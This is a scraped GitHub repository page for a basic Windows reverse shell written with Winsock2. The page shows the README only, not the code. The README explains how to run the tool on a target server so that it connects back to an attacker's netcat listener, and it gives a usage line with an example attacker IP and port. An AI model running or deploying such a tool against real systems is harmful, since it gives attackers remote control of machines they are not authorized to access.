Skip to content

A basic reverse shell on Windows using socket programming with Win32 API

Notifications You must be signed in to change notification settings

daemon104/TCP-Reverse-shell

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Basic-Reverse-shell

A basic reverse shell on Windows using socket programming with Win32 API. It is used Winsock2 DLL to create socket and make a reverse connection from server to attacker machine. Make sure to change the attacker IP, port and turn on netcat listener before run it on target server

Usage: ReverseShell.exe <attacker's IP> <port>

Example: ReverseShell.exe 192.168.1.10 7777

About

A basic reverse shell on Windows using socket programming with Win32 API

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages